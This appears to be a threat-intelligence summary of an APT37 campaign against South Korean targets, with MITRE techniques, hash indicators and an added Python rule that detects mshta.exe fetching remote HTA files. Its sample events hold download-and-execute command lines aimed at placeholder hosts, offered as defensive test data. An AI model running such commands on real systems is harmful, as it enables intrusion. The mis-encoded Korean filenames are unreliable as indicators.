Zscaler ThreatLabz analyzes APT37 (ScarCruft/Temp.Reaper), a North Korea-based threat actor targeting South Korean organizations, with activity noted in early 2023. The investigation reveals a GitHub leak exposing a wealth of malicious payloads and multiple attack vectors (CHM, XLL, LNK, macro-based MS Office, HWP), including previously undocumented themes and decoy content. #APT37 #ScarCruft #Temp.Reaper #Chinotto #PowerShell #Mshta #LNK #XLL #CHM #HWP #LGUplus
Keypoints
- APT37 is a North Korea-based APT targeting individuals in South Korean organizations.
- The GitHub repository exposure reveals numerous payloads and attack vectors dating back to October 2020.
- Attack vectors include CHM, MS Excel Add-in (XLL), LNK, macro-based MS Office documents, and HWP with embedded OLE objects.
- Decoy themes span geopolitics, South Korean companies, academia, and finance to lure victims.
- For C2, the group often leverages South Korea-based bulletin board system (BBS) sites.
- The group resumed activity in Jan 2023 and continues spear phishing; threat actor deletes files from GitHub to evade detection.
MITRE Techniques
- [T1566.001] Spearphishing Attachment — Initial access via CHM and archive-contained decoys used to deliver Chinotto backdoor. “The decoy files are password-protected. The password to open the decoy file is displayed by the CHM file.”
- [T1105] Ingress Tool Transfer — CHM loader downloads a malicious HTA file from the attacker’s server and executes it. “download a malicious HTA file from the attacker’s server and executing it.”
- [T1059.001] PowerShell — The HTA file contains the PowerShell backdoor called Chinotto. “The HTA file contains the PowerShell backdoor called Chinotto.”
- [T1023] LNK — LNK files recovered from GitHub were used to execute MSHTA and download the malicious HTA file. “these LNK files were used to execute MSHTA and download the malicious HTA file from the attacker’s server.”
- [T1059.005] Visual Basic — Macro-based MS Office Word file uses VBA macros to launch MSHTA and download the HTA file. “This macro would launch MSHTA to download the PowerShell-based Chinotto backdoor as well.”
- [T1218.005] Mshta — MSHTA is used to download and execute the HTA payload that hosts the Chinotto backdoor. “Launches MSHTA to download an HTA file from the URL: …”
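Every delivery vector in the list above (CHM opened by hh.exe, Office macro, LNK) converges on the same step: mshta.exe is launched with a remote URL to fetch the HTA that carries the Chinotto PowerShell backdoor. That convergence is the natural detection point. The following Python is an added example written for this summary, not code from Zscaler ThreatLabz or from the report; it classifies process-creation events (Sysmon Event ID 1 or equivalent EDR telemetry) by whether mshta.exe was spawned by a document handler and whether its command line references a remote URL. The five events, the example.invalid hosts, and the hwp.exe executable name are constructed assumptions, not indicators from the report.

```python
import ntpath
import re

# Process-creation events in the shape of Sysmon Event ID 1 / EDR telemetry.
# All five records are constructed sample data, not telemetry from the report;
# the example.invalid hosts are placeholders, not APT37 infrastructure.
SAMPLE_EVENTS = [
    # CHM opened with hh.exe, whose embedded command runs mshta against a remote URL
    {"parent": r"C:\Windows\hh.exe",
     "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": r"mshta.exe http://example.invalid/bbs/board/notice.hta"},
    # LNK double-clicked in Explorer, launching mshta with a remote URL
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": r'"C:\Windows\System32\mshta.exe" https://example.invalid/index.hta'},
    # Word macro launching mshta
    {"parent": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": r"mshta.exe http://example.invalid/dl.hta"},
    # Benign: unrelated process
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\notepad.exe",
     "cmdline": r"notepad.exe readme.txt"},
    # Benign: mshta running a local HTA from a system process
    {"parent": r"C:\Windows\System32\svchost.exe",
     "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": r"mshta.exe C:\Windows\System32\oobe\setup.hta"},
]

# Parents that should not normally spawn mshta.exe: the CHM viewer (hh.exe),
# Office applications, and Hancom Word (hwp.exe is an assumed executable name).
DOCUMENT_HANDLERS = {"hh.exe", "winword.exe", "excel.exe", "powerpnt.exe", "hwp.exe"}

# Only the URL scheme is checked: the fetched file need not be named *.hta.
REMOTE_URL = re.compile(r"\bhttps?://", re.IGNORECASE)


def classify(event):
    """Return 'high', 'medium' or None for one process-creation event."""
    image = ntpath.basename(event["image"]).lower()
    if image != "mshta.exe":
        return None
    parent = ntpath.basename(event["parent"]).lower()
    remote = REMOTE_URL.search(event["cmdline"]) is not None
    from_document = parent in DOCUMENT_HANDLERS
    if remote and from_document:
        return "high"    # document handler pulling an HTA from the network
    if remote or from_document:
        return "medium"  # e.g. LNK -> explorer.exe -> mshta <url>, or a local HTA from Office
    return None


def scan(events):
    """Return (index, severity, parent basename, cmdline) for every flagged event."""
    findings = []
    for i, ev in enumerate(events):
        severity = classify(ev)
        if severity:
            findings.append((i, severity, ntpath.basename(ev["parent"]), ev["cmdline"]))
    return findings


if __name__ == "__main__":
    for idx, sev, parent, cmd in scan(SAMPLE_EVENTS):
        print(f"[{sev.upper():6}] event {idx}: {parent} -> {cmd}")
```

Matching on the image basename is deliberately simple and is defeated by a renamed copy of mshta.exe; in production, key on the original file name or signer from the telemetry and pair this rule with the archive, CHM, LNK and XLL hashes listed under Indicators of Compromise. The local-HTA case from svchost.exe is left unflagged on purpose, since Windows itself uses HTA files during setup.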
Indicators of Compromise
- [MD5 hash] Archive file hashes — 3dd12d67844b047486740405ae96f1a4, e9cd4c60582a587416c4807c890f8a5b, and many more hashes
- [MD5 hash] CHM file hashes — 914521cb6b4846b2c0e85588d5224ba2, 2ffcb634118aaa6154395374f0c66010, and many more hashes
- [MD5 hash] LNK file hashes — eb7a6e3dc8bbc26f208c511ec7ee1d4c, c5f954436e9623204ed961b9b33e769d, and many more hashes
- [MD5 hash] XLL file hashes — 82d58de096f53e4df84d6f67975a8dda, and other hashes
- [MD5 hash] HWP file hashes — a4706737645582e1b5f71a462dd01140, and many more hashes
- [Filename] Archive filenames — (20220120)2022๋ ์ด๋์ฐฝํ ์ ๋ ์ธ์ฌ001.rar, (์์) ์ 20๋ ๋ํต๋ น ์ทจ์์ ์ฌ์ธ๋ํฌ ์ฐธ์์ ์ถ์ฒ ๋ช ๋จ(๊ตญ๋ฏผ์ํ๋น์ 000).rar, and many more (the Korean portions of these names are mis-encoded on this page and could not be recovered)
Read more: https://www.zscaler.com/blogs/security-research/unintentional-leak-glimpse-attack-vectors-apt37